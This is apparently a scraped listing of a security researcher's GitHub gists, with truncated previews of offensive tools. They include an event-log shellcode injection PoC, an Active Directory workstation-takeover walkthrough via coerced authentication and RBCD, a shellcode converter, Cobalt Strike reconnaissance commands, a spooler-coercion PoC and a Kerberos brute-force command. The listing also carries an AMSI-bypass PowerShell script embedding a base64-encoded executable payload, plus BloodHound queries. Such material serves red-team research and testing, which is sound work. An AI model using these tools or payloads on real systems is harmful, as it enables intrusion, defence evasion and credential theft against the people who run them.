topotam / EventLogInject.cs

Created May 8, 2022 18:34

POC to inject and extract shellcode from Windows Event Logs

	using System;
	using System.Collections.Generic;
	using System.Diagnostics;
	using System.Linq;
	using System.Runtime.InteropServices;
	using System.Text;
	using System.Threading.Tasks;

	namespace HiddenEventLogs
	{

topotam / Workstation-Takeover.md

Created July 30, 2021 13:39 — forked from gladiatx0r/Workstation-Takeover.md

From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
Relaying that machine authentication to LDAPS for configuring RBCD
RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

topotam / ConvertShellcode.py

Created May 4, 2020 08:37 — forked from rvrsh3ll/ConvertShellcode.py

	import binascii
	import sys

	file_name = sys.argv[1]
	with open (file_name) as f:
	hexdata = binascii.hexlify(f.read())
	hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
	shellcode = ''
	for i in hexlist:
	shellcode += "0x{},".format(i)

topotam / .htaccess

Created March 22, 2020 18:02 — forked from curi0usJack/.htaccess

FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.

	#
	# TO-DO: set \|DESTINATIONURL\| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
	#
	# Note this version requires Apache 2.4+
	#
	# Save this file into something like /etc/apache2/redirect.rules.
	# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
	#
	# Include /etc/apache2/redirect.rules
	#

topotam / Find-Assemblies.ps1

Created February 14, 2020 10:00 — forked from TheWover/Find-Assemblies.ps1

Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.

	Param([parameter(Mandatory=$true,
	HelpMessage="Directory to search for .NET Assemblies in.")]
	$Directory,
	[parameter(Mandatory=$false,
	HelpMessage="Whether or not to search recursively.")]
	[switch]$Recurse = $false,
	[parameter(Mandatory=$false,
	HelpMessage="Whether or not to include DLLs in the search.")]
	[switch]$DLLs = $false,
	[parameter(Mandatory=$false,

topotam / cobaltstrike_sa.txt

Created January 20, 2020 19:15 — forked from api0cradle/cobaltstrike_sa.txt

Cobalt Strike Situational Awareness Commands

	Windows version:
	reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion

	Users who have authed to the system:
	ls C:\Users\

	System env variables:
	reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment

	Saved outbound RDP connections:

topotam / dementor.py

Created September 15, 2019 06:45 — forked from 3xocyte/dementor.py

rough PoC to connect to spoolss to elicit machine account authentication

	#!/usr/bin/env python

	# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
	# some code from https://www.exploit-db.com/exploits/2879/

	import os
	import sys
	import argparse
	import binascii
	import ConfigParser

topotam / kerberos_attacks_cheatsheet.md

Created June 18, 2019 21:55 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md

A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

topotam / AMSIBypass2.ps1

Created June 18, 2019 21:36 — forked from TheWover/AMSIBypass2.ps1

Runs AMSIBypass2 to disable AMSI. Loads my packer DLL from b64, uses Reflection to call its Unpack function on packed AMSIBypass2.exe, then loads the result using Assembly.Load again. Powershell PoC of https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/

$payload = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAP7dKbEAAAAAAAAAAOAAIiALATAAAA4AAAAGAAAAAAAA2i0AAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAIctAABPAAAAAEAAAKgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAADILAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA4A0AAAAgAAAADgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgDAAAAQAAAAAQAAAAQAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAFAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAC7LQAAAAAAAEgAAAACAAUAVCMAAHQJAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswBADaAAAAAQAAEQJzDwAACgpzEAAACgsHF3MRAAAKDAYIbxIAAAoIbxMAAApzFAAACg0JCW8VAAAKCW8WAAAKbxcAAAoTBHMQAAAKEwURBREEF3MYAAAKEwYRBgdvGQAAChYHbxkAAAqOaW8aAAAKEQZvGwAAChEFbxkAAAooHAAACglvFQAACigcAAAKCW8WAAAKKBwAAApzAwAABhMH3kARBiwH

topotam / gist:c211189a1fe777dbe62d709c5f5f99ab

Created December 14, 2018 22:58 — forked from jeffmcjunkin/gist:7b4a67bb7dd0cfbfbd83768f3aa6eb12

Useful Cypher queries for BloodHound


	---------------
	MATCH (u:User)-[r:AdminTo\|MemberOf*1..]->(c:Computer
	RETURN u.name

	That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
	---------------

	MATCH
	(U:User)-[r:MemberOf\|:AdminTo*1..]->(C:Computer)

Topotam topotam

Overview

Kerberos cheatsheet

Bruteforcing